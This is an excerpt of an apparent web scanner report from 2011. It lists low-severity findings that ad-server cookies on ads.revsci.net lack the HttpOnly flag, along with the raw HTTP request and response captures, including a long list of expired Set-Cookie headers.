User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; bh="b!!!!H!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#0Db!!!!#=3*$x!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#eP^!!!!#=3*$x!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#v-#!!!!#=3*$x!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$1:.!!!!#=3!ea!$3Dm!!!!#=3*4J!$3y-!!!!'=2v<]!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea"

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:42:17 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!!U!!-O3!!!!$=3G@^!!Os7!!!!$=3G@^!!`4x!!!!$=3Ef#!!jBx!!!!#=2srH!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#0Db!!!!#=3*$x!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#N[5!!!!#=3!ea!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!$=3G@^!#bw^!!!!$=3G@^!#eP^!!!!#=3*$x!#fBj!!!!$=3G@^!#fBk!!!!$=3G@^!#fBl!!!!$=3G@^!#fBm!!!!$=3G@^!#fBn!!!!$=3G@^!#fG+!!!!$=3G@^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#v-#!!!!#=3*$x!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!$=3G@^!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$1:.!!!!#=3!ea!$3Dm!!!!#=3*4J!$3IO!!!!$=3G@^!$3y-!!!!'=2v<]!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!$=3G@^"; path=/; expires=Tue, 03-Sep-2013 00:42:17 GMT
Cache-Control: no-store
Last-Modified: Sun, 04 Sep 2011 00:42:17 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 426
Proxy-Connection: close

GIF89a.............!.......,...........D..;

14.22. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_bTBF="MLtXrEVrsC9jIDFi7XZS/nWyofj8uo4h4hQaMt62x2xHbq9QZyFp4272ogDQaLmA/RMWitRUcC8I7G491XGtkTPsKy5HIvJesYX30b0qu8WXX0HfMJuA3FHVw11laB3EptDJ+unN4T4giuXzXvB3z+ILY6CVMUX/pUeIutokG4ey0jUb+KUX7E2rAO9SAXGUST7XghGegzEMIVRrVRs="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJc+g/xMU1j2Eq62Z0x2J+T7ub2bZeJfYPutCNIwrH1XdFM+MZcHDWW+m5pc3ESBNa7QOe8RRbcs+vzlYyzs4bC+hg79E1Ob1LQ6VJ549nOzZ4+iP4Wi0dbjdNk78PtA0kzj4Maf92hlO1TwJIbwH7ceYZq2XEuBQIPh8NTPilkoTvr9B0OSW9k+IVr2JgoC2wApREepSXS7N5rvBsxW+t5Kq427OCNwYVvep0g8pYXD6AbpX0qw21q+XOdKSOVf81dLtfxvZwshBg0hi6tUyaGtMWYZjVdElQ5mthRPt9XB16B7KINYFw7O0HeD6Yq8KwE2Nzf1sqtapfdch022LTR8NRR9ym5qyvR5tiTSm5elpFZGK6dBf9dpyZc5/bu/PK54E9OklB6NzLnEN18dtYmJ4IIhpo2LsNEn47o5vfSRj9fUQYxB3e0hvMnaG8q/Kez3/EStFbUON+caWEHOYg6I6gPVP0XjXs6kw2zzk+sIyceGfLGrE71uyNJ5rkDcNoVkJozvFjTO9cF2gdsr+0DU0PNKJ6bFGYYhBGXS2sTBcntkHvLnvzPkBEj2HdtuZq/gp4s0C6zlnmicnDONgeTv1MPazWgBvj14g5DP1Ia7q96lLrk2jsQJ/PqcBO0uSkDcJAQW95pz2wB7LPAFWbtQD3yldCGsqtAcvJiz2H9OniRUvfvn/wY/Qsuej+dyG0XVuBcDn4MzMokJRG4P66YlpT1ZgLNJI0J000UoJK2C2h77U475C"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.23. http://ads.revsci.net/adserver/ako previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.revsci.net
Path:	/adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rsiPus_AzD0="MLtXrtUvti9nIDH3PvyuJZDWPvAb5rmAROC1vV+97tGjIq0KICE6IXNJpXbbtXk7SFglqytuSSifpijZkG/o9jHBIRbD9dvmp0CQ7vRdyOFH4TmnC/4OArLBdE8Hqi6o6R2PN9CCY2j1ylbdUwMYvE2vn/8yQK49ZcC2BmYHlP5TqASUaNd3SmSsruJoVhwue8QJ2Wq/HYRhwLuv+SBJuvZlzZ8Srsq2sIZOUsy2XdRmTdXJvYqRxcA7T88WNgvlk/lLSPEabgD9zqVd1+fJjSdNkIpDyzWJ1qz4xbxiA5hGMbHmUcIm4ZmDiZQ0lI1uhSsiwQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
rsi_us_1000000="pUMdJT+DPwIU1E3iGYqC+OknDNarDzE9m/tXM2y5OlYSamN+F+xfdu44vAK1LW9qi2ENBLyeepZhpAoNnAZwwWk7okoNeM6hnY4FDeSFdjLp9DlTHNdGEjk0NgfVVxKB0nEnvngZcDTqBTlUIwh2pwKZacn4hm9cIGhFcXIXBU6SBmPbJnKmYxv/0p5EDN4nttB7hb1PTJwj/3mBGjNllA12sUjy7QOOdLxfEl6GmDjn/ZexM7I/fPI8ijGMSHLODlMOfrBlcpc/EVLjRSLRI8xjjkWUcghoozYMgm/2kBMR53HBmxFjQP21MJ6qziGy5KFhz2qPm8ZgoK1+g0XpR3Kmq3TMLtl541XiOq/36oUo4MMjpuSJ2y6bPEnEG4RNytq5QtjHrtihooQg0m/lM9wDkKucEZSkzX6We4wXeCOgPS/A7BkgZy4dkUCe4edTyMDn8fmzBehL604nI2WXe85cUQ528Q14Mxu+aNOLf9YTzBvNBA1KAIjb0O0Oi+VN4FyjgQ40clMB9mqvwoFps3YOlPjPNsS2F22gQ0ivIIHmWn30Wq88O2srD/dCkj0Oq6ZssNV3f5ACcOIA0D6ZRxJO4Y/m8AWjXZYq4CFnEAlfd0xA70nDa0Q06zNeeQaAGZwXSyRBT0sY9Sei6BdID8JWlG406zH6X+6a+fgW0oipqwWFEsM5sQFrrGzszpRAm1U1sBdJZ2TSEDKubr3jIuyeiHnV6czpfJN1f8orwva/UxRbG+LRbtTY2aEs6IY/TFsITJhj8EcKApWf9WLDkqxqP9jKe9KyQx0p8UjOe+FaH0SYBdgFXAEYUAyiJn6mQbIXwpc07tmy/OujBCnSzBh9l3JW67FffY5JV4bQSgkB8PsS+t2xidb1ikY/pSzxxHBee0GB"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Dp_w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gdim=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LRgg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-Jfi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bTBF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bEm6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VfeO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_YqeU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5Dgt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_PHh7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R5ta=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sB-Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LIlC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_rEo0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LVUM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ig3D=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5dcS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dZVt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nZdO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jrA8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-EDR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LfdY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_w3Ik=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2hxF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_s6i9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qpw9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9q7G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X_m0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-vTc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zi3a=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_EVuz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hG-O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3uh_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ed-o=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DgP-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IyHz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9wJ3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3AjH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OeQh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oJJI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IKnw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FRRz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Z-ZL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BlDK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Uce7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hYlJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tvYV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_N2Wc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Xwgv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NpBx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7yN0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5ytn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R0nn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jHB4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Tbod=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dJ-5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tZle=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tAk2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2wEa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GcnD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dTlc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RcWU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mv19=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nBsJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cIpx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qQG7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TK1Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ebC_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0lxQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_W97N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-cAf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_fEAy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DcHG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-kXI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mvhC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jgOQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sECh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BUMx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_aOWp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nXqC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DJxo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_m2_A=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_M0jo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_I-qW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_PC0B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OcGH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lpX7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_x85Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Y4G3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DxQf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_WxUe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qxKk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DMxV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_irVm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9NFF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lc2G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Vs1Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zrkg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BAU5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6_lC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nHxo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R12Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_AFG2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DAxJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OiN2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_22wc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9z65=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cWvO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6AGk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X5fA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xCLB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VeZQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GdYU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Nuyz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9LuU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8hPO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__hgI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zCmS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zB78=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3cxz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0Svs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tIki=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VmnB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VnuE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jU0b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FnTH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8VJk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gN5g=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NGZ6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ykIF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lvxT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ru6l=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_fsx9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mjM4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TAJT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_K27G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_E_cj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-r_t=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_c9Qy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_okZc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_f9hD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_piZk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_amP2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jzux=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_S261=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_U-lS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GRM2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ru44=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_05qP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_WUD5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_37Ra=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pdjm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
